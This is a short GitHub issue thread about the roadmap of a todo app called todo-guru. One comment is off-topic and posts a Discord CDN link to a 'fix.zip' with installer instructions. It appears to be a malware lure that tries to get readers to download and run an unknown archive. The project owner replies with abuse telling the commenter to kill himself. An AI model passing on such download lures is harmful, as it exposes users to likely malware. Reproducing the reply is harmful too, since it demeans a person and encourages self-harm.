### ISSUE TITLE
TODO: future Of this project

### ISSUE THREAD

**Issue by marios-pz** [mario-pz/todo-guru#10]
- [ ] Rework Backend

I want contributions for the below, as I am not planning to do them myself
- [ ] Add TUI client (Go)
- [ ] Web Frontend (Svelte or similar new technology)
- [ ] Mobile Client (Kotlin)

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by marios-pz** [comment]
@Dominic54321 How about you try killing yourself?
